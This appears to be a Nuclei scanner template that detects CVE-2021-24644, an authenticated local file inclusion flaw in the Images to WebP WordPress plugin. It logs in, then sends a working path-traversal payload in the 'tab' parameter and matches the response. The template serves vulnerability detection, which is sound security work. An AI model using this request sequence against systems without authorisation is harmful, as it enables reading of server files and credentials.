id: CVE-2021-24644 info: name: Images to WebP < 1.9 - Authenticated Local File Inclusion author: Sourabh-Sahu severity: high description: | The Images to WebP WordPress plugin before version 1.9 did not validate or sanitize the tab parameter before using it in the include() function. impact: | Authenticated attackers can read arbitrary local files from the server via path traversal, potentially exposing sensitive configuration files, credentials, and system information. remediation: Fixed in 1.9 reference: - https://wpscan.com/vulnerability/5a363eeb-9510-4535-97e2-9dfd3b10d511/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24644 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24644 cwe-id: CWE-22 epss-score: 0.05028 epss-percentile: 0.91183 cpe: cpe:2.3:a:imagestowebp_project:images_to_webp:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: imagestowebp_project product: images_to_webp framework: wordpress publicwww-query: "/wp-content/plugins/images-to-webp/" tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev,vuln flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - status_code == 302 - contains(header, "wordpress_logged_in") condition: and internal: true - raw: - | GET /wp-admin/upload.php?page=images-to-webp.php&tab=..%2F..%2F..%2F..%2Fwp-links-opml HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains_all(body, "wp-links-opml", "Images to WebP") - regex('[A-Za-z]{3}, [0-9]{2} [A-Za-z]{3} 20[0-9]{2}', body) condition: and # digest: 490a004630440220056a601f61ff3f7419ff5013b6470c51ece52211901a236c21ea50adc85f5db402207390c2ae4bab8097c95e37cc03e03696eb468dc403cea8b2e1454c8ab7134eaf:922c64590222798bb761d5b6d8e72950